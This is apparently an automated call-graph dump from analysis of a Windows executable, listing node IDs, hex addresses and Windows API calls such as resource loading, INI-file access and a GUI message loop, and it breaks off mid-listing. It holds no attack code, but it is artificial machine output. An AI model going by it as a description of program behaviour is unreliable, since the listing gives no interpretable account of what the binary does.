37682->37681 39833 4148b6 FindResourceW 39834 4148f9 39833->39834 39835 4148cf SizeofResource 39833->39835 39835->39834 39836 4148e0 LoadResource 39835->39836 39836->39834 39837 4148ee LockResource 39836->39837 39837->39834 37683 415308 free 39838 441b3f 39848 43a9f6 39838->39848 39840 441b61 40021 4386af memset 39840->40021 39842 44189a 39843 442bd4 39842->39843 39844 4418e2 39842->39844 39845 4418ea 39843->39845 40023 441409 memset 39843->40023 39844->39845 40022 4414a9 12 API calls 39844->40022 39849 43aa20 39848->39849 39850 43aadf 39848->39850 39849->39850 39851 43aa34 memset 39849->39851 39850->39840 39852 43aa56 39851->39852 39853 43aa4d 39851->39853 40024 43a6e7 39852->40024 40032 42c02e memset 39853->40032 39858 43aad3 40034 4169a7 11 API calls 39858->40034 39859 43aaae 39859->39850 39859->39858 39874 43aae5 39859->39874 39861 43ac18 39863 43ac47 39861->39863 40036 42bbd5 memcpy memcpy memcpy memset memcpy 39861->40036 39864 43aca8 39863->39864 40037 438eed 16 API calls 39863->40037 39868 43acd5 39864->39868 40039 4233ae 11 API calls 39864->40039 39867 43ac87 40038 4233c5 16 API calls 39867->40038 40040 423426 11 API calls 39868->40040 39872 43ace1 40041 439811 163 API calls 39872->40041 39873 43a9f6 161 API calls 39873->39874 39874->39850 39874->39861 39874->39873 40035 439bbb 22 API calls 39874->40035 39876 43acfd 39882 43ad2c 39876->39882 40042 438eed 16 API calls 39876->40042 39878 43ad19 40043 4233c5 16 API calls 39878->40043 39879 43ad58 40044 44081d 163 API calls 39879->40044 39882->39879 39884 43add9 39882->39884 39884->39884 40048 423426 11 API calls 39884->40048 39885 43ae3a memset 39886 43ae73 39885->39886 40049 42e1c0 147 API calls 39886->40049 39887 43adab 40046 438c4e 163 API calls 39887->40046 39889 43ad6c 39889->39850 39889->39887 40045 42370b memset memcpy memset 39889->40045 39891 43ae96 40050 42e1c0 147 API calls 39891->40050 39893 43adcc 40047 440f84 12 API calls 39893->40047 39896 43aea8 39897 43aec1 39896->39897 40051 42e199 147 API calls 39896->40051 39899 43af00 39897->39899 40052 42e1c0 147 API calls 39897->40052 39899->39850 39902 43af1a 39899->39902 39903 43b3d9 39899->39903 40053 438eed 16 API calls 39902->40053 39908 43b3f6 39903->39908 39915 43b4c8 39903->39915 39905 43b60f 39905->39850 40112 4393a5 17 API calls 39905->40112 39906 43af2f 40054 4233c5 16 API calls 39906->40054 40094 432878 12 API calls 39908->40094 39910 43af51 40055 423426 11 API calls 39910->40055 39913 43af7d 40056 423426 11 API calls 39913->40056 39914 43b4f2 40101 43a76c 21 API calls 39914->40101 39915->39914 40100 42bbd5 memcpy memcpy memcpy memset memcpy 39915->40100 39919 43b529 40102 44081d 163 API calls 39919->40102 39920 43af94 40057 423330 11 API calls 39920->40057 39924 43b47e 39928 43b497 39924->39928 40097 42374a memcpy memset memcpy memcpy memcpy 39924->40097 39925 43b544 39929 43b55c 39925->39929 40103 42c02e memset 39925->40103 39926 43b428 39947 43b462 39926->39947 40095 432b60 16 API calls 39926->40095 39927 43afca 40058 423330 11 API calls 39927->40058 40098 4233ae 11 API calls 39928->40098 40104 43a87a 163 API calls 39929->40104 39934 43afdb 40059 4233ae 11 API calls 39934->40059 39936 43b4b1 40099 423399 11 API calls 39936->40099 39938 43b56c 39948 43b58a 39938->39948 40105 423330 11 API calls 39938->40105 39940 43afee 40060 44081d 163 API calls 39940->40060 39942 43b4c1 40108 42db80 163 API calls 39942->40108 39946 43b592 40107 43a82f 16 API calls 39946->40107 40096 423330 11 API calls 39947->40096 40106 440f84 12 API calls 39948->40106 39951 43b5b4 40109 438c4e 163 API calls 39951->40109 39953 43b5cf 40110 42c02e memset 39953->40110 39955 43b005 39955->39850 39958 43b01f 39955->39958 40061 42d836 163 API calls 39955->40061 39956 43b1ef 40071 4233c5 16 API calls 39956->40071 39958->39956 40069 423330 11 API calls 39958->40069 40070 42d71d 163 API calls 39958->40070 39959 43b212 40072 423330 11 API calls 39959->40072 39962 43add4 39962->39905 40111 438f86 16 API calls 39962->40111 39965 43b087 40062 4233ae 11 API calls 39965->40062 39966 43b22a 40073 42ccb5 11 API calls 39966->40073 39969 43b10f 40065 423330 11 API calls 39969->40065 39970 43b23f 40074 4233ae 11 API calls 39970->40074 39972 43b257 40075 4233ae 11 API calls 39972->40075 39976 43b26e 40076 4233ae 11 API calls 39976->40076 39977 43b129 40066 4233ae 11 API calls 39977->40066 39980 43b09a 39980->39969 40063 42cc15 19 API calls 39980->40063 40064 4233ae 11 API calls 39980->40064 39981 43b282 40077 43a87a 163 API calls 39981->40077 39983 43b13c 40067 440f84 12 API calls 39983->40067 39985 43b29d 40078 423330 11 API calls 39985->40078 39988 43b15f 40068 4233ae 11 API calls 39988->40068 39989 43b2af 39991 43b2b8 39989->39991 39992 43b2ce 39989->39992 40079 4233ae 11 API calls 39991->40079 40080 440f84 12 API calls 39992->40080 39995 43b2c9 40082 4233ae 11 API calls 39995->40082 39996 43b2da 40081 42370b memset memcpy memset 39996->40081 39999 43b2f9 40083 423330 11 API calls 39999->40083 40001 43b30b 40084 423330 11 API calls 40001->40084 40003 43b325 40085 423399 11 API calls 40003->40085 40005 43b332 40086 4233ae 11 API calls 40005->40086 40007 43b354 40087 423399 11 API calls 40007->40087 40009 43b364 40088 43a82f 16 API calls 40009->40088 40011 43b370 40089 42db80 163 API calls 40011->40089 40013 43b380 40090 438c4e 163 API calls 40013->40090 40015 43b39e 40091 423399 11 API calls 40015->40091 40017 43b3ae 40092 43a76c 21 API calls 40017->40092 40019 43b3c3 40093 423399 11 API calls 40019->40093 40021->39842 40022->39845 40023->39843 40025 43a6f5 40024->40025 40026 43a765 40024->40026 40025->40026 40113 42a115 40025->40113 40026->39850 40033 4397fd memset 40026->40033 40030 43a73d 40030->40026 40031 42a115 147 API calls 40030->40031 40031->40026 40032->39852 40033->39859 40034->39850 40035->39874 40036->39863 40037->39867 40038->39864 40039->39868 40040->39872 40041->39876 40042->39878 40043->39882 40044->39889 40045->39887 40046->39893 40047->39962 40048->39885 40049->39891 40050->39896 40051->39897 40052->39897 40053->39906 40054->39910 40055->39913 40056->39920 40057->39927 40058->39934 40059->39940 40060->39955 40061->39965 40062->39980 40063->39980 40064->39980 40065->39977 40066->39983 40067->39988 40068->39958 40069->39958 40070->39958 40071->39959 40072->39966 40073->39970 40074->39972 40075->39976 40076->39981 40077->39985 40078->39989 40079->39995 40080->39996 40081->39995 40082->39999 40083->40001 40084->40003 40085->40005 40086->40007 40087->40009 40088->40011 40089->40013 40090->40015 40091->40017 40092->40019 40093->39962 40094->39926 40095->39947 40096->39924 40097->39928 40098->39936 40099->39942 40100->39914 40101->39919 40102->39925 40103->39929 40104->39938 40105->39948 40106->39946 40107->39942 40108->39951 40109->39953 40110->39962 40111->39905 40112->39850 40114 42a175 40113->40114 40116 42a122 40113->40116 40114->40026 40119 42b13b 147 API calls 40114->40119 40116->40114 40117 42a115 147 API calls 40116->40117 40120 43a174 40116->40120 40144 42a0a8 147 API calls 40116->40144 40117->40116 40119->40030 40134 43a196 40120->40134 40135 43a19e 40120->40135 40121 43a306 40121->40134 40153 4388c4 14 API calls 40121->40153 40124 42a115 147 API calls 40124->40135 40125 415a91 memset 40125->40135 40126 43a642 40126->40134 40170 4169a7 11 API calls 40126->40170 40130 43a635 40169 42c02e memset 40130->40169 40134->40116 40135->40121 40135->40124 40135->40125 40135->40134 40145 42ff8c 40135->40145 40161 4165ff 40135->40161 40164 439504 13 API calls 40135->40164 40165 4312d0 147 API calls 40135->40165 40166 42be4c memcpy memcpy memcpy memset memcpy 40135->40166 40167 43a121 11 API calls 40135->40167 40137 4169a7 11 API calls 40138 43a325 40137->40138 40138->40126 40138->40130 40138->40134 40138->40137 40139 42b5b5 memset memcpy 40138->40139 40140 42bf4c 14 API calls 40138->40140 40143 4165ff 11 API calls 40138->40143 40154 42b63e 40138->40154 40168 42bfcf memcpy 40138->40168 40139->40138 40140->40138 40143->40138 40144->40116 40171 43817e 40145->40171 40147 42ff99 40148 42ffe3 40147->40148 40149 42ffd0 40147->40149 40152 42ff9d 40147->40152 40176 4169a7 11 API calls 40148->40176 40175 4169a7 11 API calls 40149->40175 40152->40135 40153->40138 40316 42b4ec 40154->40316 40156 42b64c 40322 42b5e4 memset 40156->40322 40158 42b65e 40159 42b66d 40158->40159 40323 42b3c6 11 API calls 40158->40323 40159->40138 40162 4165a0 11 API calls 40161->40162 40163 41660d 40162->40163 40163->40135 40164->40135 40165->40135 40166->40135 40167->40135 40168->40138 40169->40126 40170->40134 40172 438187 40171->40172 40174 438192 40171->40174 40177 4380f6 40172->40177 40174->40147 40175->40152 40176->40152 40179 43811f 40177->40179 40178 438164 40178->40174 40179->40178 40181 4300e8 3 API calls 40179->40181 40182 437e5e 40179->40182 40181->40179 40205 437d3c 40182->40205 40184 437eb3 40184->40179 40185 437ea9 40185->40184 40191 437f22 40185->40191 40220 41f432 40185->40220 40188 437f06 40267 415c56 11 API calls 40188->40267 40190 437f95 40268 415c56 11 API calls 40190->40268 40192 437f7f 40191->40192 40193 432d4e 3 API calls 40191->40193 40192->40190 40194 43802b 40192->40194 40193->40192 40196 4165ff 11 API calls 40194->40196 40197 438054 40196->40197 40231 437371 40197->40231 40200 43806b 40201 438094 40200->40201 40269 42f50e 138 API calls 40200->40269 40202 437fa3 40201->40202 40204 4300e8 3 API calls 40201->40204 40202->40184 40270 41f638 104 API calls 40202->40270 40204->40202 40206 437d69 40205->40206 40209 437d80 40205->40209 40271 437ccb 11 API calls 40206->40271 40208 437d76 40208->40185 40209->40208 40210 437da3 40209->40210 40211 437d90 40209->40211 40213 438460 134 API calls 40210->40213 40211->40208 40275 437ccb 11 API calls 40211->40275 40215 437dcb 40213->40215 40219 437de8 40215->40219 40272 444283 13 API calls 40215->40272 40217 437dfc 40273 437ccb 11 API calls 40217->40273 40274 424f26 123 API calls 40219->40274 40221 41f54d 40220->40221 40224 41f44f 40220->40224 40222 41f466 40221->40222 40305 41c635 memset memset 40221->40305 40222->40188 40222->40191 40224->40222 40229 41f50b 40224->40229 40276 41f1a5 40224->40276 40301 41c06f memcmp 40224->40301 40302 41f3b1 90 API calls 40224->40302 40303 41f398 86 API calls 40224->40303 40229->40221 40229->40222 40304 41c295 86 API calls 40229->40304 40232 41703f 11 API calls 40231->40232 40233 437399 40232->40233 40234 43739d 40233->40234 40235 4373ac 40233->40235 40306 4446ea 11 API calls 40234->40306 40237 416935 16 API calls 40235->40237 40260 4373ca 40237->40260 40238 437584 40240 4375bc 40238->40240 40313 42453e 123 API calls 40238->40313 40239 438460 134 API calls 40239->40260 40242 415c7d 16 API calls 40240->40242 40243 4375d2 40242->40243 40245 4442e6 11 API calls 40243->40245 40247 4373a7 40243->40247 40244 4251c4 137 API calls 40244->40260 40246 4375e2 40245->40246 40246->40247 40314 444283 13 API calls 40246->40314 40247->40200 40249 415a91 memset 40249->40260 40252 43758f 40312 42453e 123 API calls 40252->40312 40255 4375f4 40258 437620 40255->40258 40259 43760b 40255->40259 40257 43759f 40261 416935 16 API calls 40257->40261 40263 416935 16 API calls 40258->40263 40315 444283 13 API calls 40259->40315 40260->40238 40260->40239 40260->40244 40260->40249 40260->40252 40266 437d3c 135 API calls 40260->40266 40307 425433 13 API calls 40260->40307 40308 425413 17 API calls 40260->40308 40309 42533e 16 API calls 40260->40309 40310 42538f 16 API calls 40260->40310 40311 42453e 123 API calls 40260->40311 40261->40238 40263->40247 40265 437612 memcpy 40265->40247 40266->40260 40267->40184 40268->40202 40269->40201 40270->40184 40271->40208 40272->40217 40273->40219 40274->40208 40275->40208 40277 41bc3b 101 API calls 40276->40277 40278 41f1b4 40277->40278 40279 41edad 86 API calls 40278->40279 40286 41f282 40278->40286 40280 41f1cb 40279->40280 40281 41f1f5 memcmp 40280->40281 40282 41f20e 40280->40282 40280->40286 40281->40282 40283 41f21b memcmp 40282->40283 40282->40286 40284 41f326 40283->40284 40287 41f23d 40283->40287 40285 41ee6b 86 API calls 40284->40285 40284->40286 40285->40286 40286->40224 40287->40284 40288 41f28e memcmp 40287->40288 40290 41c8df 56 API calls 40287->40290 40288->40284 40289 41f2a9 40288->40289 40289->40284 40292 41f308 40289->40292 40293 41f2d8 40289->40293 40291 41f269 40290->40291 40291->40284 40294 41f287 40291->40294 40295 41f27a 40291->40295 40292->40284 40299 4446ce 11 API calls 40292->40299 40296 41ee6b 86 API calls 40293->40296 40294->40288 40297 41ee6b 86 API calls 40295->40297 40298 41f2e0 40296->40298 40297->40286 40300 41b1ca memset 40298->40300 40299->40284 40300->40286 40301->40224 40302->40224 40303->40224 40304->40221 40305->40222 40306->40247 40307->40260 40308->40260 40309->40260 40310->40260 40311->40260 40312->40257 40313->40240 40314->40255 40315->40265 40317 42b4ff 40316->40317 40318 415a91 memset 40317->40318 40319 42b52c 40318->40319 40320 42b553 memcpy 40319->40320 40321 42b545 40319->40321 40320->40321 40321->40156 40322->40158 40323->40159 37684 41276d 37685 41277d 37684->37685 37727 4044a4 LoadLibraryW 37685->37727 37687 412785 37719 412789 37687->37719 37735 414b81 37687->37735 37690 4127c8 37741 412465 memset ??2@YAPAXI 37690->37741 37692 4127ea 37753 40ac21 37692->37753 37697 412813 37771 40dd07 memset 37697->37771 37698 412827 37776 40db69 memset 37698->37776 37701 412822 37797 4125b6 ??3@YAXPAX 37701->37797 37703 40ada2 _wcsicmp 37704 41283d 37703->37704 37704->37701 37707 412863 CoInitialize 37704->37707 37781 41268e 37704->37781 37801 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37707->37801 37711 41296f 37803 40b633 37711->37803 37713 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37718 412957 CoUninitialize 37713->37718 37724 4128ca 37713->37724 37718->37701 37720 4128d0 TranslateAcceleratorW 37721 412941 GetMessageW 37720->37721 37720->37724 37721->37718 37721->37720 37722 412909 IsDialogMessageW 37722->37721 37722->37724 37723 4128fd IsDialogMessageW 37723->37721 37723->37722 37724->37720 37724->37722 37724->37723 37725 41292b TranslateMessage DispatchMessageW 37724->37725 37726 41291f IsDialogMessageW 37724->37726 37725->37721 37726->37721 37726->37725 37728 4044cf GetProcAddress 37727->37728 37732 4044f7 37727->37732 37729 4044e8 FreeLibrary 37728->37729 37730 4044df 37728->37730 37731 4044f3 37729->37731 37729->37732 37730->37729 37731->37732 37733 404507 MessageBoxW 37732->37733 37734 40451e 37732->37734 37733->37687 37734->37687 37736 414b8a 37735->37736 37737 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37735->37737 37807 40a804 memset 37736->37807 37737->37690 37740 414b9e GetProcAddress 37740->37737 37742 4124e0 37741->37742 37743 412505 ??2@YAPAXI 37742->37743 37744 41251c 37743->37744 37746 412521 37743->37746 37829 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37744->37829 37818 444722 37746->37818 37752 41259b wcscpy 37752->37692 37834 40b1ab free free 37753->37834 37755 40ad76 37835 40aa04 37755->37835 37758 40a9ce malloc memcpy free free 37761 40ac5c 37758->37761 37759 40ad4b 37759->37755 37847 40a9ce 37759->37847 37761->37755 37761->37758 37761->37759 37762 40ace7 free 37761->37762 37838 40a8d0 7 API calls 37761->37838 37839 4099f4 37761->37839 37762->37761 37767 40ada2 37768 40adc9 37767->37768 37769 40adaa 37767->37769 37768->37697 37768->37698 37769->37768 37770 40adb3 _wcsicmp 37769->37770 37770->37768 37770->37769 37853 40dce0 37771->37853 37773 40dd3a GetModuleHandleW 37858 40dba7 37773->37858 37777 40dce0 3 API calls 37776->37777 37778 40db99 37777->37778 37930 40dae1 37778->37930 37944 402f3a 37781->37944 37783 412766 37783->37701 37783->37707 37784 4126d3 _wcsicmp 37785 4126a8 37784->37785 37785->37783 37785->37784 37787 41270a 37785->37787 37978 4125f8 7 API calls 37785->37978 37787->37783 37947 411ac5 37787->37947 37798 4125da 37797->37798 37799 4125f0 37798->37799 37800 4125e6 DeleteObject 37798->37800 37802 40b1ab free free 37799->37802 37800->37799 37801->37713 37802->37711 37804 40b640 37803->37804 37805 40b639 free 37803->37805 37806 40b1ab free free 37804->37806 37805->37804 37806->37719 37808 40a83b GetSystemDirectoryW 37807->37808 37809 40a84c wcscpy 37807->37809 37808->37809 37814 409719 wcslen 37809->37814 37812 40a881 LoadLibraryW 37813 40a886 37812->37813 37813->37737 37813->37740 37815 409724 37814->37815 37816 409739 wcscat LoadLibraryW 37814->37816 37815->37816 37817 40972c wcscat 37815->37817 37816->37812 37816->37813 37817->37816 37819 444732 37818->37819 37820 444728 DeleteObject 37818->37820 37830 409cc3 37819->37830 37820->37819 37822 412551 37823 4010f9 37822->37823 37824 401130 37823->37824 37825 401134 GetModuleHandleW LoadIconW 37824->37825 37826 401107 wcsncat 37824->37826 37827 40a7be 37825->37827 37826->37824 37828 40a7d2 37827->37828 37828->37752 37828->37828 37829->37746 37833 409bfd memset wcscpy 37830->37833 37832 409cdb CreateFontIndirectW 37832->37822 37833->37832 37834->37761 37836 40aa14 37835->37836 37837 40aa0a free 37835->37837 37836->37767 37837->37836 37838->37761 37840 409a41 37839->37840 37841 4099fb malloc 37839->37841 37840->37761 37843 409a37 37841->37843 37844 409a1c 37841->37844 37843->37761 37845 409a30 free 37844->37845 37846 409a20 memcpy 37844->37846 37845->37843 37846->37845 37848 40a9e7 37847->37848 37849 40a9dc free 37847->37849 37851 4099f4 3 API calls 37848->37851 37850 40a9f2 37849->37850 37852 40a8d0 7 API calls 37850->37852 37851->37850 37852->37755 37877 409bca GetModuleFileNameW 37853->37877 37855 40dce6 wcsrchr 37856 40dcf5 37855->37856 37857 40dcf9 wcscat 37855->37857 37856->37857 37857->37773 37878 44db70 37858->37878 37862 40dbfd 37881 4447d9 37862->37881 37865 40dc34 wcscpy wcscpy 37907 40d6f5 37865->37907 37866 40dc1f wcscpy 37866->37865 37869 40d6f5 3 API calls 37870 40dc73 37869->37870 37871 40d6f5 3 API calls 37870->37871 37872 40dc89 37871->37872 37873 40d6f5 3 API calls 37872->37873 37874 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37873->37874 37913 40da80 37874->37913 37877->37855 37879 40dbb4 memset memset 37878->37879 37880 409bca GetModuleFileNameW 37879->37880 37880->37862 37883 4447f4 37881->37883 37882 40dc1b 37882->37865 37882->37866 37883->37882 37884 444807 ??2@YAPAXI 37883->37884 37885 44481f 37884->37885 37886 444873 _snwprintf 37885->37886 37887 4448ab wcscpy 37885->37887 37920 44474a 8 API calls 37886->37920 37889 4448bb 37887->37889 37921 44474a 8 API calls 37889->37921 37890 4448a7 37890->37887 37890->37889 37892 4448cd 37922 44474a 8 API calls 37892->37922 37894 4448e2 37923 44474a 8 API calls 37894->37923 37896 4448f7 37924 44474a 8 API calls 37896->37924 37898 44490c 37925 44474a 8 API calls 37898->37925 37900 444921 37926 44474a 8 API calls 37900->37926 37902 444936 37927 44474a 8 API calls 37902->37927 37904 44494b 37928 44474a 8 API calls 37904->37928 37906 444960 ??3@YAXPAX 37906->37882 37908 44db70 37907->37908 37909 40d702 memset GetPrivateProfileStringW 37908->37909 37910 40d752 37909->37910 37911 40d75c WritePrivateProfileStringW 37909->37911 37910->37911 37912 40d758 37910->37912 37911->37912 37912->37869 37914 44db70 37913->37914 37915 40da8d memset 37914->37915 37916 40daac LoadStringW 37915->37916 37917 40dac6 37916->37917 37917->37916 37919 40dade 37917->37919 37929 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37917->37929 37919->37701 37920->37890 37921->37892 37922->37894 37923->37896 37924->37898 37925->37900 37926->37902 37927->37904 37928->37906 37929->37917 37940 409b98 GetFileAttributesW 37930->37940 37932 40daea 37933 40db63 37932->37933 37934 40daef wcscpy wcscpy GetPrivateProfileIntW 37932->37934 37933->37703 37941 40d65d GetPrivateProfileStringW 37934->37941 37936 40db3e 37942 40d65d GetPrivateProfileStringW 37936->37942 37938 40db4f 37943 40d65d GetPrivateProfileStringW 37938->37943 37940->37932 37941->37936 37942->37938 37943->37933 37979 40eaff 37944->37979 37948 411ae2 memset 37947->37948 37949 411b8f 37947->37949 38019 409bca GetModuleFileNameW 37948->38019 37961 411a8b 37949->37961 37951 411b0a wcsrchr 37952 411b22 wcscat 37951->37952 37953 411b1f 37951->37953 38020 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37952->38020 37953->37952 37955 411b67 38021 402afb 37955->38021 37959 411b7f 38077 40ea13 SendMessageW memset SendMessageW 37959->38077 37962 402afb 27 API calls 37961->37962 37963 411ac0 37962->37963 37964 4110dc 37963->37964 37965 41113e 37964->37965 37970 4110f0 37964->37970 38102 40969c LoadCursorW SetCursor 37965->38102 37967 411143 38103 4032b4 37967->38103 38121 444a54 37967->38121 37968 4110f7 _wcsicmp 37968->37970 37969 411157 37971 40ada2 _wcsicmp 37969->37971 37970->37965 37970->37968 38124 410c46 10 API calls 37970->38124 37974 411167 37971->37974 37972 4111af 37974->37972 37975 4111a6 qsort 37974->37975 37975->37972 37978->37785 37980 40eb10 37979->37980 37992 40e8e0 37980->37992 37983 40eb6c memcpy memcpy 37984 40ebb7 37983->37984 37984->37983 37985 40ebf2 ??2@YAPAXI ??2@YAPAXI 37984->37985 37987 40d134 16 API calls 37984->37987 37986 40ec2e ??2@YAPAXI 37985->37986 37990 40ec65 37985->37990 37986->37990 37987->37984 37990->37990 38002 40ea7f 37990->38002 37991 402f49 37991->37785 37993 40e8f2 37992->37993 37994 40e8eb ??3@YAXPAX 37992->37994 37995 40e900 37993->37995 37996 40e8f9 ??3@YAXPAX 37993->37996 37994->37993 37997 40e911 37995->37997 37998 40e90a ??3@YAXPAX 37995->37998 37996->37995 37999 40e931 ??2@YAPAXI ??2@YAPAXI 37997->37999 38000 40e921 ??3@YAXPAX 37997->38000 38001 40e92a ??3@YAXPAX 37997->38001 37998->37997 37999->37983 38000->38001 38001->37999 38003 40aa04 free 38002->38003 38004 40ea88 38003->38004 38005 40aa04 free 38004->38005 38006 40ea90 38005->38006 38007 40aa04 free 38006->38007 38008 40ea98 38007->38008 38009 40aa04 free 38008->38009 38010 40eaa0 38009->38010 38011 40a9ce 4 API calls 38010->38011 38012 40eab3 38011->38012 38013 40a9ce 4 API calls 38012->38013 38014 40eabd 38013->38014 38015 40a9ce 4 API calls 38014->38015 38016 40eac7 38015->38016 38017 40a9ce 4 API calls 38016->38017 38018 40ead1 38017->38018 38018->37991 38019->37951 38020->37955 38078 40b2cc 38021->38078 38023 402b0a 38024 40b2cc 27 API calls 38023->38024 38025 402b23 38024->38025 38026 40b2cc 27 API calls 38025->38026 38027 402b3a 38026->38027 38028 40b2cc 27 API calls 38027->38028 38029 402b54 38028->38029 38030 40b2cc 27 API calls 38029->38030 38031 402b6b 38030->38031 38032 40b2cc 27 API calls 38031->38032 38033 402b82 38032->38033 38034 40b2cc 27 API calls 38033->38034 38035 402b99 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402bb0 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402bc7 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402bde 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402bf5 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402c0c 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402c23 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402c3a 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402c51 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402c68 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c7f 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c99 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402cb3 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402cd5 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402cf0 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402d0b 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402d26 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 402d3e 38068->38069 38070 40b2cc 27 API calls 38069->38070 38071 402d59 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402d78 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d93 38074->38075 38076 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38075->38076 38076->37959 38077->37949 38081 40b58d 38078->38081 38080 40b2d1 38080->38023 38082 40b5a4 GetModuleHandleW FindResourceW 38081->38082 38083 40b62e 38081->38083 38084 40b5c2 LoadResource 38082->38084 38086 40b5e7 38082->38086 38083->38080 38085 40b5d0 SizeofResource LockResource 38084->38085 38084->38086 38085->38086 38086->38083 38094 40afcf 38086->38094 38088 40b608 memcpy 38097 40b4d3 memcpy 38088->38097 38090 40b61e 38098 40b3c1 18 API calls 38090->38098 38092 40b626 38099 40b04b 38092->38099 38095 40b04b ??3@YAXPAX 38094->38095 38096 40afd7 ??2@YAPAXI 38095->38096 38096->38088 38097->38090 38098->38092 38100 40b051 ??3@YAXPAX 38099->38100 38101 40b05f 38099->38101 38100->38101 38101->38083 38102->37967 38104 4032c4 38103->38104 38105 40b633 free 38104->38105 38106 403316 38105->38106 38125 44553b 38106->38125 38110 403480 38323 40368c 15 API calls 38110->38323 38112 403489 38113 40b633 free 38112->38113 38114 403495 38113->38114 38114->37969 38115 4033a9 memset memcpy 38116 4033ec wcscmp 38115->38116 38117 40333c 38115->38117 38116->38117 38117->38110 38117->38115 38117->38116 38321 4028e7 11 API calls 38117->38321 38322 40f508 6 API calls 38117->38322 38119 403421 _wcsicmp 38119->38117 38122 444a64 FreeLibrary 38121->38122 38123 444a83 38121->38123 38122->38123 38123->37969 38124->37970 38126 445548 38125->38126 38127 445599 38126->38127 38324 40c768 38126->38324 38128 4455a8 memset 38127->38128 38140 4457f2 38127->38140 38407 403988 38128->38407 38135 4458aa 38137 44594a 38135->38137 38138 4458bb memset memset 38135->38138 38136 445672 38418 403fbe memset memset memset memset memset 38136->38418 38142 4459ed 38137->38142 38143 44595e memset memset 38137->38143 38145 414c2e 17 API calls 38138->38145 38147 445854 38140->38147 38509 403e2d memset memset memset memset memset 38140->38509 38150 445a00 memset memset 38142->38150 38151 445b22 38142->38151 38152 414c2e 17 API calls 38143->38152 38144 4455e5 38144->38136 38155 44560f 38144->38155 38153 4458f9 38145->38153 38146 44557a 38148 44558c 38146->38148 38605 4136c0 CoTaskMemFree 38146->38605 38147->38135 38532 403c9c memset memset memset memset memset 38147->38532 38391 444b06 38148->38391 38555 414c2e 38150->38555 38158 445bca 38151->38158 38159 445b38 memset memset memset 38151->38159 38163 44599c 38152->38163 38154 40b2cc 27 API calls 38153->38154 38164 445909 38154->38164 38166 4087b3 338 API calls 38155->38166 38157 445849 38621 40b1ab free free 38157->38621 38165 445c8b memset memset 38158->38165 38222 445cf0 38158->38222 38169 445bd4 38159->38169 38170 445b98 38159->38170 38173 40b2cc 27 API calls 38163->38173 38182 409d1f 6 API calls 38164->38182 38174 414c2e 17 API calls 38165->38174 38183 445621 38166->38183 38167 445585 38606 41366b FreeLibrary 38167->38606 38168 44589f 38622 40b1ab free free 38168->38622 38180 414c2e 17 API calls 38169->38180 38170->38169 38176 445ba2 38170->38176 38185 4459ac 38173->38185 38186 445cc9 38174->38186 38694 4099c6 wcslen 38176->38694 38177 4456b2 38609 40b1ab free free 38177->38609 38179 40b2cc 27 API calls 38189 445a4f 38179->38189 38191 445be2 38180->38191 38181 403335 38320 4452e5 45 API calls 38181->38320 38194 445919 38182->38194 38607 4454bf 20 API calls 38183->38607 38184 445823 38184->38157 38203 4087b3 338 API calls 38184->38203 38195 409d1f 6 API calls 38185->38195 38197 409d1f 6 API calls 38186->38197 38187 445879 38187->38168 38207 4087b3 338 API calls 38187->38207 38571 409d1f wcslen wcslen 38189->38571 38201 40b2cc 27 API calls 38191->38201 38192 445d3d 38220 40b2cc 27 API calls 38192->38220 38193 445d88 memset memset memset 38204 414c2e 17 API calls 38193->38204 38623 409b98 GetFileAttributesW 38194->38623 38196 4459bc 38195->38196 38690 409b98 GetFileAttributesW 38196->38690 38206 445ce1 38197->38206 38198 445bb3 38697 445403 memset 38198->38697 38199 445680 38199->38177 38441 4087b3 memset 38199->38441 38210 445bf3 38201->38210 38203->38184 38213 445dde 38204->38213 38714 409b98 GetFileAttributesW 38206->38714 38207->38187 38219 409d1f 6 API calls 38210->38219 38211 445928 38211->38137 38624 40b6ef 38211->38624 38221 40b2cc 27 API calls 38213->38221 38214 4459cb 38214->38142 38231 40b6ef 253 API calls 38214->38231 38218 40b2cc 27 API calls 38224 445a94 38218->38224 38226 445c07 38219->38226 38227 445d54 _wcsicmp 38220->38227 38230 445def 38221->38230 38222->38181 38222->38192 38222->38193 38223 445389 259 API calls 38223->38158 38576 40ae18 38224->38576 38225 44566d 38225->38140 38492 413d4c 38225->38492 38234 445389 259 API calls 38226->38234 38235 445d71 38227->38235 38297 445d67 38227->38297 38229 445665 38608 40b1ab free free 38229->38608 38236 409d1f 6 API calls 38230->38236 38231->38142 38239 445c17 38234->38239 38715 445093 23 API calls 38235->38715 38242 445e03 38236->38242 38238 4456d8 38244 40b2cc 27 API calls 38238->38244 38245 40b2cc 27 API calls 38239->38245 38241 44563c 38241->38229 38247 4087b3 338 API calls 38241->38247 38716 409b98 GetFileAttributesW 38242->38716 38243 40b6ef 253 API calls 38243->38181 38250 4456e2 38244->38250 38251 445c23 38245->38251 38246 445d83 38246->38181 38247->38241 38249 445e12 38255 445e6b 38249->38255 38259 40b2cc 27 API calls 38249->38259 38610 413fa6 _wcsicmp _wcsicmp 38250->38610 38254 